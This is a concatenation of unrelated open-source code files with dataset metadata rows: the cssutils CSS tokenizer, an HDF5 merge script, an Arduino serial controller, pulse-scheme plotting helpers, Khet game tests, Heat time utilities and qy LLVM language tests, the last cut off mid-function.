= (0,0,0) FG = (255,255,255) blendmode = pg.BLEND_MULT temp = self._get_new_surface(text, pixel_size) temp.fill(BG) temp.blit(self._render_internal(text, size, FG, BG), offset) self._fill_image(temp, image, blendmode) return temp def _normal(self, text, size, pixel_size, offset, color = None): """ Return a normal render of the text. """ s = self._get_new_surface(text, pixel_size) img = self._render_internal(text, size, color, self.TRANSPARENT) img.set_colorkey(self.TRANSPARENT) s.blit(img, offset) return s def _shadows(self, text, size, pixel_size, offset, positions_and_colors): """ Add 'shadows' with different colors. """ wo_effects_ps = self[size].size(text) offset = ((pixel_size[0] - wo_effects_ps[0]) / 2, (pixel_size[1] - wo_effects_ps[1]) / 2) f = self._render_internal s = self._get_new_surface(text, pixel_size) transparent = self.TRANSPARENT for pos,color in positions_and_colors: shadow = f(text, size, color, transparent) shadow.set_colorkey(transparent) n_pos = (pos[0]+offset[0], pos[1]+offset[1]) s.blit(shadow, n_pos) return s def _external_border(self, text, size, pixel_size, offset, width = None, color = None): """ Add an external border (outside of the font). """ wo_effects_ps = self[size].size(text) offset = ((pixel_size[0] - wo_effects_ps[0]) / 2, (pixel_size[1] - wo_effects_ps[1]) / 2) l = [] for x, y in product(xrange(-width, width+1, 1),xrange(-width, width+1, 1)): l.append( ((x,y),color) ) return self._shadows(text, size, pixel_size, offset, l) def _internal_border(self, text, size, pixel_size, offset, color = None): """ Add an internal border (inside of the font). """ # Use very different colors to get a very sharp edge BG = (0,0,0) FG = (255,255,255) temp = self._get_new_surface(text, pixel_size) temp.fill(BG) temp.blit(self._render_internal(text, size, FG, BG), offset) temp = laplacian(temp) temp.set_colorkey(FG) result = self._get_new_surface(text, pixel_size) result.fill(color) result.blit(temp, (0,0)) result.set_colorkey(BG) return result
gpl-3.0
-3,237,735,693,081,282,000
32.137652
107
0.5719
false
3.688598
false
false
false
kgn/cssutils
src/cssutils/tokenize2.py
1
9735
#!/usr/bin/env python # -*- coding: utf-8 -*- """New CSS Tokenizer (a generator) """ __all__ = ['Tokenizer', 'CSSProductions'] __docformat__ = 'restructuredtext' __version__ = '$Id$' from cssproductions import * from helper import normalize import itertools import re _TOKENIZER_CACHE = {} class Tokenizer(object): """ generates a list of Token tuples: (Tokenname, value, startline, startcolumn) """ _atkeywords = { u'@font-face': CSSProductions.FONT_FACE_SYM, u'@import': CSSProductions.IMPORT_SYM, u'@media': CSSProductions.MEDIA_SYM, u'@namespace': CSSProductions.NAMESPACE_SYM, u'@page': CSSProductions.PAGE_SYM, u'@variables': CSSProductions.VARIABLES_SYM } _linesep = u'\n' unicodesub = re.compile(r'\\[0-9a-fA-F]{1,6}(?:\r\n|[\t|\r|\n|\f|\x20])?').sub cleanstring = re.compile(r'\\((\r\n)|[\n|\r|\f])').sub def __init__(self, macros=None, productions=None, doComments=True): """ inits tokenizer with given macros and productions which default to cssutils own macros and productions """ if type(macros)==type({}): macros_hash_key = sorted(macros.items()) else: macros_hash_key = macros hash_key = str((macros_hash_key, productions)) if hash_key in _TOKENIZER_CACHE: (tokenmatches, commentmatcher, urimatcher) = _TOKENIZER_CACHE[hash_key] else: if not macros: macros = MACROS if not productions: productions = PRODUCTIONS tokenmatches = self._compile_productions(self._expand_macros(macros, productions)) commentmatcher = [x[1] for x in tokenmatches if x[0] == 'COMMENT'][0] urimatcher = [x[1] for x in tokenmatches if x[0] == 'URI'][0] _TOKENIZER_CACHE[hash_key] = (tokenmatches, commentmatcher, urimatcher) self.tokenmatches = tokenmatches self.commentmatcher = commentmatcher self.urimatcher = urimatcher self._doComments = doComments self._pushed = [] def _expand_macros(self, macros, productions): """returns macro expanded productions, order of productions is kept""" def macro_value(m): return '(?:%s)' % macros[m.groupdict()['macro']] expanded = [] for key, value in productions: while re.search(r'{[a-zA-Z][a-zA-Z0-9-]*}', value): value = re.sub(r'{(?P<macro>[a-zA-Z][a-zA-Z0-9-]*)}', macro_value, value) expanded.append((key, value)) return expanded def _compile_productions(self, expanded_productions): """compile productions into callable match objects, order is kept""" compiled = [] for key, value in expanded_productions: compiled.append((key, re.compile('^(?:%s)' % value, re.U).match)) return compiled def push(self, *tokens): """Push back tokens which have been pulled but not processed.""" self._pushed = itertools.chain(tokens, self._pushed) def clear(self): self._pushed = [] def tokenize(self, text, fullsheet=False): """Generator: Tokenize text and yield tokens, each token is a tuple of:: (name, value, line, col) The token value will contain a normal string, meaning CSS unicode escapes have been resolved to normal characters. The serializer escapes needed characters back to unicode escapes depending on the stylesheet target encoding. 
text to be tokenized fullsheet if ``True`` appends EOF token as last one and completes incomplete COMMENT or INVALID (to STRING) tokens """ def _repl(m): "used by unicodesub" num = int(m.group(0)[1:], 16) if num < 0x10000: return unichr(num) else: return m.group(0) def _normalize(value): "normalize and do unicodesub" return normalize(self.unicodesub(_repl, value)) line = col = 1 # check for BOM first as it should only be max one at the start (BOM, matcher), productions = self.tokenmatches[0], self.tokenmatches[1:] match = matcher(text) if match: found = match.group(0) yield (BOM, found, line, col) text = text[len(found):] # check for @charset which is valid only at start of CSS if text.startswith('@charset '): found = '@charset ' # production has trailing S! yield (CSSProductions.CHARSET_SYM, found, line, col) text = text[len(found):] col += len(found) while text: # do pushed tokens before new ones for pushed in self._pushed: yield pushed # speed test for most used CHARs, sadly . not possible :( c = text[0] if c in u',:;{}>+[]': yield ('CHAR', c, line, col) col += 1 text = text[1:] else: # check all other productions, at least CHAR must match for name, matcher in productions: # TODO: USE bad comment? if fullsheet and name == 'CHAR' and text.startswith(u'/*'): # before CHAR production test for incomplete comment possiblecomment = u'%s*/' % text match = self.commentmatcher(possiblecomment) if match and self._doComments: yield ('COMMENT', possiblecomment, line, col) text = None # ate all remaining text break match = matcher(text) # if no match try next production if match: found = match.group(0) # needed later for line/col if fullsheet: # check if found may be completed into a full token if 'INVALID' == name and text == found: # complete INVALID to STRING with start char " or ' name, found = 'STRING', '%s%s' % (found, found[0]) elif 'FUNCTION' == name and\ u'url(' == _normalize(found): # url( is a FUNCTION if incomplete sheet # FUNCTION production MUST BE after URI production for end in (u"')", u'")', u')'): possibleuri = '%s%s' % (text, end) match = self.urimatcher(possibleuri) if match: name, found = 'URI', match.group(0) break if name in ('DIMENSION', 'IDENT', 'STRING', 'URI', 'HASH', 'COMMENT', 'FUNCTION', 'INVALID', 'UNICODE-RANGE'): # may contain unicode escape, replace with normal # char but do not _normalize (?) value = self.unicodesub(_repl, found) if name in ('STRING', 'INVALID'): #'URI'? # remove \ followed by nl (so escaped) from string value = self.cleanstring('', found) else: if 'ATKEYWORD' == name: try: # get actual ATKEYWORD SYM name = self._atkeywords[_normalize(found)] except KeyError, e: # might also be misplace @charset... if '@charset' == found and u' ' == text[len(found):len(found)+1]: # @charset needs tailing S! name = CSSProductions.CHARSET_SYM found += u' ' else: name = 'ATKEYWORD' value = found # should not contain unicode escape (?) if self._doComments or (not self._doComments and name != 'COMMENT'): yield (name, value, line, col) text = text[len(found):] nls = found.count(self._linesep) line += nls if nls: col = len(found[found.rfind(self._linesep):]) else: col += len(found) break if fullsheet: yield ('EOF', u'', line, col)
gpl-3.0
-3,785,011,545,157,365,000
41.851351
101
0.451567
false
4.901813
false
false
false
startcode/apollo
modules/tools/prediction/mlp_train/merge_h5.py
1
2643
#!/usr/bin/env python

###############################################################################
# Copyright 2018 The Apollo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################

import os
import glob
import argparse
import datetime

import numpy as np
import h5py


def load_hdf5(filename):
    """
    load training samples from *.hdf5 file
    """
    if not(os.path.exists(filename)):
        print "file:", filename, "does not exist"
        os._exit(1)
    if os.path.splitext(filename)[1] != '.h5':
        print "file:", filename, "is not an hdf5 file"
        os._exit(1)

    h5_file = h5py.File(filename, 'r')
    values = h5_file.values()[0]
    print "load data size:", values.shape[0]
    return values


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description = 'generate training samples\
        from a specified directory')
    parser.add_argument('directory', type=str,
                        help='directory contains feature files in .h5')
    args = parser.parse_args()

    path = args.directory
    print "load h5 from directory:", format(path)
    if os.path.isdir(path):
        features = None
        labels = None

        h5_files = glob.glob(path + '/*.h5')
        print "Length of files:", len(h5_files)
        for i, h5_file in enumerate(h5_files):
            print "Process File", i, ":", h5_file
            feature = load_hdf5(h5_file)
            if np.any(np.isinf(feature)):
                print "inf data found"
            features = np.concatenate((features, feature), axis=0) if features is not None \
                else feature
    else:
        print "Fail to find", path
        os._exit(-1)

    date = datetime.datetime.now().strftime('%Y-%m-%d')
    sample_dir = path + '/mlp_merge'
    if not os.path.exists(sample_dir):
        os.makedirs(sample_dir)
    sample_file = sample_dir + '/mlp_' + date + '.h5'
    print "Save samples file to:", sample_file

    h5_file = h5py.File(sample_file, 'w')
    h5_file.create_dataset('data', data=features)
    h5_file.close()
apache-2.0
-8,108,443,370,418,419,000
32.455696
92
0.595157
false
3.875367
false
false
false
twitter/heron
integration_test/src/python/integration_test/topology/one_spout_multi_tasks/one_spout_multi_tasks.py
2
1572
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-

# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.

# pylint: disable=missing-docstring
from heronpy.api.stream import Grouping

from integration_test.src.python.integration_test.core import TestTopologyBuilder
from integration_test.src.python.integration_test.common.bolt import IdentityBolt
from integration_test.src.python.integration_test.common.spout import ABSpout


def one_spout_multi_tasks_builder(topology_name, http_server_url):
  builder = TestTopologyBuilder(topology_name, http_server_url)
  ab_spout = builder.add_spout("ab-spout", ABSpout, 3)
  builder.add_bolt("identity-bolt", IdentityBolt,
                   inputs={ab_spout: Grouping.SHUFFLE},
                   par=1,
                   optional_outputs=['word'])

  return builder.create_topology()
apache-2.0
4,743,227,587,584,489,000
40.368421
81
0.741094
false
3.787952
true
false
false
webbhorn/Arduino-Switch-Controller
arduino/arduino.py
1
2214
#!/usr/bin/env python import serial, time class Arduino(object): __OUTPUT_PINS = -1 def __init__(self, port, baudrate=9600): self.serial = serial.Serial(port, baudrate) def __str__(self): return "Arduino is on port %s at %d baudrate" %(self.serial.port, self.serial.baudrate) def output(self, pinArray): self.__sendData(len(pinArray)) if(isinstance(pinArray, list) or isinstance(pinArray, tuple)): self.__OUTPUT_PINS = pinArray for each_pin in pinArray: self.__sendPin(each_pin) return True def setLow(self, pin): self.__sendData('0') self.__sendPin(pin) return True def setHigh(self, pin): self.__sendData('1') self.__sendPin(pin) return True def getState(self, pin): self.__sendData('2') self.__sendPin(pin) return self.__formatPinState(self.__getData()) def analogWrite(self, pin, value): self.__sendData('3') hex_value = hex(value)[2:] if(len(hex_value)==1): self.__sendData('0') else: self.__sendData(hex_value[0]) self.__sendData(hex_value[1]) return True def analogRead(self, pin): self.__sendData('4') self.__sendPin(pin) return self.__getData() def turnOff(self): for each_pin in self.__OUTPUT_PINS: self.setLow(each_pin) return True def __sendPin(self, pin): pin_in_char = chr(pin+48) self.__sendData(pin_in_char) def __sendData(self, serial_data): while(self.__getData()!="what"): pass self.serial.write(str(serial_data)) def __getData(self): return self.serial.readline().replace("\r\n","") def __formatPinState(self, pinValue): if pinValue=='1': return True else: return False def close(self): self.serial.close() return True """ def __del__(self): #close serial connection once program ends #this fixes the problem of port getting locked or unrecoverable in some linux systems self.serial.close() """
mit
4,657,381,806,307,410,000
24.744186
95
0.555104
false
3.771721
false
false
false
clouserw/zamboni
mkt/websites/views.py
1
1959
from django.db.transaction import non_atomic_requests

from rest_framework.generics import ListAPIView
from rest_framework.permissions import AllowAny

from mkt.api.authentication import (RestOAuthAuthentication,
                                    RestSharedSecretAuthentication)
from mkt.api.base import CORSMixin, MarketplaceView
from mkt.api.paginator import ESPaginator
from mkt.search.filters import (PublicSearchFormFilter, RegionFilter,
                                SearchQueryFilter)
from mkt.search.forms import SimpleSearchForm
from mkt.websites.indexers import WebsiteIndexer
from mkt.websites.models import Website
from mkt.websites.serializers import ESWebsiteSerializer, WebsiteSerializer


class WebsiteView(CORSMixin, MarketplaceView, ListAPIView):
    cors_allowed_methods = ['get']
    authentication_classes = [RestSharedSecretAuthentication,
                              RestOAuthAuthentication]
    permission_classes = [AllowAny]
    serializer_class = WebsiteSerializer
    model = Website


class WebsiteSearchView(CORSMixin, MarketplaceView, ListAPIView):
    """
    Base website search view based on a single-string query.
    """
    cors_allowed_methods = ['get']
    authentication_classes = [RestSharedSecretAuthentication,
                              RestOAuthAuthentication]
    permission_classes = [AllowAny]
    filter_backends = [PublicSearchFormFilter, RegionFilter,
                       SearchQueryFilter]
    serializer_class = ESWebsiteSerializer
    paginator_class = ESPaginator
    form_class = SimpleSearchForm

    def get_queryset(self):
        return WebsiteIndexer.search()

    @classmethod
    def as_view(cls, **kwargs):
        # Make all search views non_atomic: they should not need the db, or
        # at least they should not need to make db writes, so they don't need
        # to be wrapped in transactions.
        view = super(WebsiteSearchView, cls).as_view(**kwargs)
        return non_atomic_requests(view)
bsd-3-clause
-3,533,117,552,146,456,000
38.979592
79
0.720265
false
4.462415
false
false
false
rizumu/bootmachine
bootmachine/management/__init__.py
1
3322
# (c) 2008-2011 James Tauber and contributors; written for Pinax (http://pinaxproject.com) # Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php import os import sys import bootmachine BOOTMACHINE_COMMAND_DIR = os.path.join( os.path.dirname(bootmachine.__file__), "management", "commands" ) class CommandNotFound(Exception): pass class CommandLoader(object): def __init__(self): self.command_dir = BOOTMACHINE_COMMAND_DIR self.commands = {} self._load_commands() def _load_commands(self): for f in os.listdir(self.command_dir): if not f.startswith("_") and f.endswith(".py"): name = f[:-3] mod = "bootmachine.management.commands.%s" % name try: __import__(mod) except: self.commands[name] = sys.exc_info() else: mod = sys.modules[mod] self.commands[name] = mod.Command() def load(self, name): try: command = self.commands[name] except KeyError: raise CommandNotFound("Unable to find command '%s'" % name) else: if isinstance(command, tuple): # an exception occurred when importing the command so let's # re-raise it here raise(command[0], command[1], command[2]) return command class CommandRunner(object): usage = "bootmachine-admin command [options] [args]" def __init__(self, argv=None): self.argv = argv or sys.argv[:] self.loader = CommandLoader() self.loader.commands["help"] = self.help() def help(self): loader, usage = self.loader, self.usage # use BaseCommand for --version from bootmachine.management.base import BaseCommand class HelpCommand(BaseCommand): def handle(self, *args, **options): print("Usage: {}\n".format(usage)) print("Options:" " --version show program's version number and exit\n" " -h, --help show this help message and exit\n" "Available commands:\n") for command in loader.commands.keys(): print(" {}".format(command)) return HelpCommand() def execute(self): argv = self.argv[:] try: command = self.argv[1] except IndexError: # display help if no arguments were given. command = "help" argv.extend(["help"]) # special cases for bootmachine-admin itself if command in ["-h", "--help"]: argv.pop() command = "help" argv.extend(["help"]) if command == "--version": argv.pop() command = "help" argv.extend(["help", "--version"]) # load command and run it! try: self.loader.load(command).run_from_argv(argv) except CommandNotFound as e: sys.stderr.write("{}\n".format(e.args[0])) sys.exit(1) def execute_from_command_line(): """ A simple method that runs a ManagementUtility. """ runner = CommandRunner() runner.execute()
mit
-1,116,202,746,595,356,300
30.339623
90
0.54124
false
4.353866
false
false
false
DiCarloLab-Delft/PycQED_py3
pycqed/utilities/pulse_scheme.py
1
5469
import numpy as np import matplotlib.pyplot as plt import matplotlib.patches def new_pulse_fig(figsize): ''' Open a new figure and configure it to plot pulse schemes. ''' fig, ax = plt.subplots(1, 1, figsize=figsize, frameon=False) ax.axis('off') fig.subplots_adjust(bottom=0, top=1, left=0, right=1) ax.axhline(0, color='0.75') return fig, ax def new_pulse_subplot(fig, *args, **kwargs): ''' Add a new subplot configured for plotting pulse schemes to a figure. All *args and **kwargs are passed to fig.add_subplot. ''' ax = fig.add_subplot(*args, **kwargs) ax.axis('off') fig.subplots_adjust(bottom=0, top=1, left=0, right=1) ax.axhline(0, color='0.75') return ax def mwPulse(ax, pos, y_offs=0, width=1.5, amp=1, label=None, phase=0, labelHeight=1.3, color='C0', modulation='normal', **plot_kws): ''' Draw a microwave pulse: Gaussian envelope with modulation. ''' x = np.linspace(pos, pos + width, 100) envPos = amp * np.exp(-(x - (pos + width / 2))**2 / (width / 4)**2) envNeg = -amp * np.exp(-(x - (pos + width / 2))**2 / (width / 4)**2) if modulation == 'normal': mod = envPos * np.sin(2 * np.pi * 3 / width * x + phase) elif modulation == 'high': mod = envPos * np.sin(5 * np.pi * 3 / width * x + phase) else: raise ValueError() ax.plot(x, envPos+y_offs, '--', color=color, **plot_kws) ax.plot(x, envNeg+y_offs, '--', color=color, **plot_kws) ax.plot(x, mod+y_offs, '-', color=color, **plot_kws) if label is not None: ax.text(pos + width / 2, labelHeight, label, horizontalalignment='right', color=color) return pos + width def fluxPulse(ax, pos, y_offs=0, width=2.5, s=.1, amp=1.5, label=None, labelHeight=1.7, color='C1', **plot_kws): ''' Draw a smooth flux pulse, where the rising and falling edges are given by Fermi-Dirac functions. s: smoothness of edge ''' x = np.linspace(pos, pos + width, 100) y = amp / ((np.exp(-(x - (pos + 5.5 * s)) / s) + 1) * (np.exp((x - (pos + width - 5.5 * s)) / s) + 1)) ax.fill_between(x, y+y_offs, color=color, alpha=0.3) ax.plot(x, y+y_offs, color=color, **plot_kws) if label is not None: ax.text(pos + width / 2, labelHeight, label, horizontalalignment='center', color=color) return pos + width def ramZPulse(ax, pos, y_offs=0, width=2.5, s=0.1, amp=1.5, sep=1.5, color='C1'): ''' Draw a Ram-Z flux pulse, i.e. only part of the pulse is shaded, to indicate cutting off the pulse at some time. ''' xLeft = np.linspace(pos, pos + sep, 100) xRight = np.linspace(pos + sep, pos + width, 100) xFull = np.concatenate((xLeft, xRight)) y = amp / ((np.exp(-(xFull - (pos + 5.5 * s)) / s) + 1) * (np.exp((xFull - (pos + width - 5.5 * s)) / s) + 1)) yLeft = y[:len(xLeft)] ax.fill_between(xLeft, yLeft+y_offs, alpha=0.3, color=color, linewidth=0.0) ax.plot(xFull, y+y_offs, color=color) return pos + width def modZPulse(ax, pos, y_offs=0, width=2.5, s=0.1, amp=1.5, sep=1.5, color='C1'): ''' Draw a modulated Z pulse. ''' return pos + width def interval(ax, start, stop, y_offs = 0, height=1.5, label=None, labelHeight=None, vlines=True, color='k', arrowstyle='<|-|>', **plot_kws): ''' Draw an arrow to indicate an interval. 
''' if labelHeight is None: labelHeight = height + 0.2 arrow = matplotlib.patches.FancyArrowPatch( posA=(start, height+y_offs), posB=(stop, height+y_offs), arrowstyle=arrowstyle, color=color, mutation_scale=7, **plot_kws) ax.add_patch(arrow) if vlines: ax.plot([start, start], [0+y_offs, height+y_offs], '--', color=color, **plot_kws) ax.plot([stop, stop], [0+y_offs, height+y_offs], '--', color=color, **plot_kws) if label is not None: ax.text((start + stop) / 2, labelHeight+y_offs, label, color=color, horizontalalignment='center') def interval_vertical(ax, start, stop, position, label=None, labelHeight=None, color='k', arrowstyle='<|-|>', labeloffset: float = 0, horizontalalignment='center'): ''' Draw an arrow to indicate an interval. ''' if labelHeight is None: labelHeight = (start+stop)/2 arrow = matplotlib.patches.FancyArrowPatch( posA=(position, start), posB=(position, stop), arrowstyle=arrowstyle, color=color, mutation_scale=7) ax.add_patch(arrow) if label is not None: ax.text(position+labeloffset, labelHeight, label, color=color, horizontalalignment=horizontalalignment) def meter(ax, x0, y0, y_offs=0, w=1.1, h=.8, color='black', fillcolor=None): """ Draws a measurement meter on the specified position. """ if fillcolor == None: fill = False else: fill = True p1 = matplotlib.patches.Rectangle( (x0-w/2, y0-h/2+y_offs), w, h, facecolor=fillcolor, edgecolor=color, fill=fill, zorder=5) ax.add_patch(p1) p0 = matplotlib.patches.Wedge( (x0, y0-h/4+y_offs), .4, theta1=40, theta2=180-40, color=color, lw=2, width=.01, zorder=5) ax.add_patch(p0) ax.arrow(x0, y0-h/4+y_offs, dx=.5*np.cos(np.deg2rad(70)), dy=.5*np.sin(np.deg2rad(60)), width=.03, color=color, zorder=5)
mit
-4,925,029,477,719,938,000
32.552147
89
0.585848
false
2.957815
false
false
false
TheWiseLion/pykhet
tests/game_tests.py
1
5304
import unittest from pykhet.components.types import MoveType, Move, TeamColor, Orientation from pykhet.components.types import Position from pykhet.games.game_types import ClassicGame class TestClassicGames(unittest.TestCase): def setUp(self): self.game = ClassicGame() def tearDown(self): self.game = None def test_available_moves_classic(self): sphinx_moves_silver = self.game.get(0, 0).get_moves(self.game) sphinx_moves_red = self.game.get(9, 7).get_moves(self.game) # Sphinx Only Has 1 Move self.assertEquals(len(sphinx_moves_silver), 1) self.assertEquals(len(sphinx_moves_silver), len(sphinx_moves_red)) pharaoh_moves_silver = self.game.get(5, 0).get_moves(self.game) pharaoh_moves_red = self.game.get(4, 7).get_moves(self.game) # three moves, zero rotations self.assertEquals(len(pharaoh_moves_red), 3) self.assertEquals(len(pharaoh_moves_red), len(pharaoh_moves_silver)) # Test Anubises anubis_moves_silver = self.game.get(4, 0).get_moves(self.game) anubis_moves_red = self.game.get(5, 7).get_moves(self.game) # four move, two rotations self.assertEquals(len(anubis_moves_red), 6) self.assertEquals(len(anubis_moves_red), len(anubis_moves_silver)) anubis_moves_silver = self.game.get(6, 0).get_moves(self.game) anubis_moves_red = self.game.get(3, 7).get_moves(self.game) # three moves, two rotations self.assertEquals(len(anubis_moves_red), 5) self.assertEquals(len(anubis_moves_red), len(anubis_moves_silver)) # Test Scarabs scarab1_moves_silver = self.game.get(4, 3).get_moves(self.game) scarab1_moves_red = self.game.get(5, 4).get_moves(self.game) # 4 moves, 1 swap, 2 rotations self.assertEquals(len(scarab1_moves_silver), 7) self.assertEquals(len(scarab1_moves_red), len(scarab1_moves_silver)) scarab2_moves_silver = self.game.get(5, 3).get_moves(self.game) scarab2_moves_red = self.game.get(4, 4).get_moves(self.game) # 5 moves, 2 rotations self.assertEquals(len(scarab2_moves_silver), 7) self.assertEquals(len(scarab2_moves_red), len(scarab2_moves_silver)) # Test Pyramids: p1_silver = self.game.get(2, 1).get_moves(self.game) p1_red = self.game.get(7, 6).get_moves(self.game) # 6 moves, 2 rotations self.assertEquals(len(p1_silver), 8) self.assertEquals(len(p1_red), len(p1_silver)) p2_silver = self.game.get(6, 5).get_moves(self.game) p2_red = self.game.get(3, 2).get_moves(self.game) # 5 moves, 2 rotations self.assertEquals(len(p2_red), 7) self.assertEquals(len(p2_red), len(p2_silver)) p3_silver = self.game.get(0, 3).get_moves(self.game) p3_red = self.game.get(9, 3).get_moves(self.game) # 4 moves, 2 rotations self.assertEquals(len(p3_red), 6) self.assertEquals(len(p3_red), len(p3_silver)) p3_silver = self.game.get(0, 4).get_moves(self.game) p3_red = self.game.get(9, 4).get_moves(self.game) # 4 moves, 2 rotations self.assertEquals(len(p3_red), 6) self.assertEquals(len(p3_red), len(p3_silver)) p4_silver = self.game.get(2, 3).get_moves(self.game) p4_red = self.game.get(7, 4).get_moves(self.game) # 6 moves, 2 rotations self.assertEquals(len(p4_red), 8) self.assertEquals(len(p4_red), len(p4_silver)) p5_silver = self.game.get(7, 0).get_moves(self.game) p5_red = self.game.get(2, 7).get_moves(self.game) # 4 moves, 2 rotations self.assertEquals(len(p5_silver), 6) self.assertEquals(len(p5_red), len(p5_silver)) def test_destroy_pieces_classic(self): self.game.apply_move(Move(MoveType.move, Position(2, 1), Position(2, 0))) self.game.apply_laser(TeamColor.silver) self.game.apply_move(Move(MoveType.move, Position(7, 6), Position(7, 7))) self.game.apply_laser(TeamColor.red) self.game.apply_move(Move(MoveType.rotate, Position(0, 
0), Orientation.right)) self.game.apply_laser(TeamColor.silver) self.assertEquals(len(self.game.squares_with_pieces_of_color(TeamColor.silver)), len(self.game.squares_with_pieces_of_color(TeamColor.red)) + 1) self.game.apply_move(Move(MoveType.rotate, Position(9, 7), Orientation.left)) self.game.apply_laser(TeamColor.red) self.assertEquals(len(self.game.squares_with_pieces_of_color(TeamColor.silver)), len(self.game.squares_with_pieces_of_color(TeamColor.red))) def test_red_wins_classic(self): self.game.apply_move(Move(MoveType.move, Position(0, 3), Position(0, 2))) self.game.apply_move(Move(MoveType.move, Position(3, 2), Position(5, 2))) self.game.apply_laser(TeamColor.silver) self.assertEquals(self.game.winner, TeamColor.red) def simple_silver_win(self): pass def test_same_number_moves(self): red_moves = self.game.get_available_moves(TeamColor.red) silver_moves = self.game.get_available_moves(TeamColor.silver) self.assertEquals(len(red_moves), len(silver_moves))
mit
1,106,180,224,603,944,700
41.774194
89
0.643477
false
2.963128
true
false
false
takeshineshiro/heat
heat/common/timeutils.py
1
2831
# # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ Utilities for handling ISO 8601 duration format. """ import datetime import random import re import time from heat.common.i18n import _ iso_duration_re = re.compile('PT(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?$') wallclock = time.time class Duration(object): ''' Note that we don't attempt to handle leap seconds or large clock jumps here. The latter are assumed to be rare and the former negligible in the context of the timeout. Time zone adjustments, Daylight Savings and the like *are* handled. PEP 418 adds a proper monotonic clock, but only in Python 3.3. ''' def __init__(self, timeout=0): self._endtime = wallclock() + timeout def expired(self): return wallclock() > self._endtime def endtime(self): return self._endtime def parse_isoduration(duration): """ Convert duration in ISO 8601 format to second(s). Year, Month, Week, and Day designators are not supported. Example: 'PT12H30M5S' """ result = iso_duration_re.match(duration) if not result: raise ValueError(_('Only ISO 8601 duration format of the form ' 'PT#H#M#S is supported.')) t = 0 t += (3600 * int(result.group(1))) if result.group(1) else 0 t += (60 * int(result.group(2))) if result.group(2) else 0 t += int(result.group(3)) if result.group(3) else 0 return t def retry_backoff_delay(attempt, scale_factor=1.0, jitter_max=0.0): """ Calculate an exponential backoff delay with jitter. Delay is calculated as 2^attempt + (uniform random from [0,1) * jitter_max) :param attempt: The count of the current retry attempt :param scale_factor: Multiplier to scale the exponential delay by :param jitter_max: Maximum of random seconds to add to the delay :returns: Seconds since epoch to wait until """ exp = float(2 ** attempt) * float(scale_factor) if jitter_max == 0.0: return exp return exp + random.random() * jitter_max def round_to_seconds(dt): """Round a datetime to the nearest second.""" rounding = 0 if dt.microsecond >= 500000: rounding = 1 return dt + datetime.timedelta(0, rounding, -dt.microsecond)
apache-2.0
-6,785,138,763,645,567,000
29.771739
78
0.655245
false
3.759628
false
false
false
bsilverthorn/qy
src/qy/test/test_language.py
1
8791
""" @author: Bryan Silverthorn <bcs@cargo-cult.org> """ import math import numpy import qy from nose.tools import ( assert_true, assert_false, assert_equal, assert_raises, assert_almost_equal, ) from qy import ( emit_and_execute, Object, ) def test_qy_python_no_arguments(): """ Test the python() LLVM construct without arguments. """ executed = [False] @emit_and_execute() def _(): @qy.python() def _(): executed[0] = [True] assert_true(executed[0]) def test_qy_python_arguments(): """ Test the python() LLVM construct with arguments. """ values = [] @emit_and_execute() def _(): @qy.for_(8) def _(i): @qy.python(i) def _(j): values.append(j) assert_equal(values, range(8)) def test_qy_python_exception(): """ Test exception handling in the python() LLVM construct. """ class ExpectedException(Exception): pass def should_raise(): @emit_and_execute() def _(): @qy.python() def _(): raise ExpectedException() assert_raises(ExpectedException, should_raise) def test_qy_python_exception_short_circuiting(): """ Test short-circuiting of exceptions in the python() LLVM construct. """ class ExpectedException(Exception): pass def should_raise(): @emit_and_execute() def _(): @qy.python() def _(): raise ExpectedException() @qy.python() def _(): assert_true(False, "control flow was not short-circuited") assert_raises(ExpectedException, should_raise) def test_qy_if_(): """ Test the qy-LLVM if_() construct. """ bad = [True] @emit_and_execute() def _(): @qy.if_(True) def _(): @qy.python() def _(): del bad[:] assert_false(bad) @emit_and_execute() def _(): @qy.if_(False) def _(): @qy.python() def _(): assert_true(False) def test_qy_if_else(): """ Test the qy-LLVM if_else() construct. """ bad = [True] @emit_and_execute() def _(): @qy.if_else(True) def _(then): if then: @qy.python() def _(): del bad[:] else: @qy.python() def _(): assert_true(False) assert_false(bad) bad = [True] @emit_and_execute() def _(): @qy.if_else(False) def _(then): if then: @qy.python() def _(): assert_true(False) else: @qy.python() def _(): del bad[:] assert_false(bad) def test_qy_for_(): """ Test the qy-LLVM for_() loop construct. """ count = 128 iterations = [0] @emit_and_execute() def _(): @qy.for_(count) def _(_): @qy.python() def _(): iterations[0] += 1 assert_equal(iterations[0], count) def test_qy_break_(): """ Test the qy break_() statement. """ count = 64 iterations = [0] @emit_and_execute() def _(): @qy.for_(count * 2) def _(i): @qy.python() def _(): iterations[0] += 1 @qy.if_(i == count - 1) def _(): qy.break_() assert_equal(iterations[0], count) def test_qy_object_basics(): """ Test basic operations on LLVM-wrapped Python objects. """ result = [None] text = "testing" def do_function(string_py): result[0] = string_py @emit_and_execute() def _(): do = Object.from_object(do_function) string = Object.from_string(text) do(string) assert_equal(result, [text]) def test_qy_py_print(): """ Test the py_print() LLVM construct with arguments. """ import sys from cStringIO import StringIO old_stdout = sys.stdout try: new_stdout 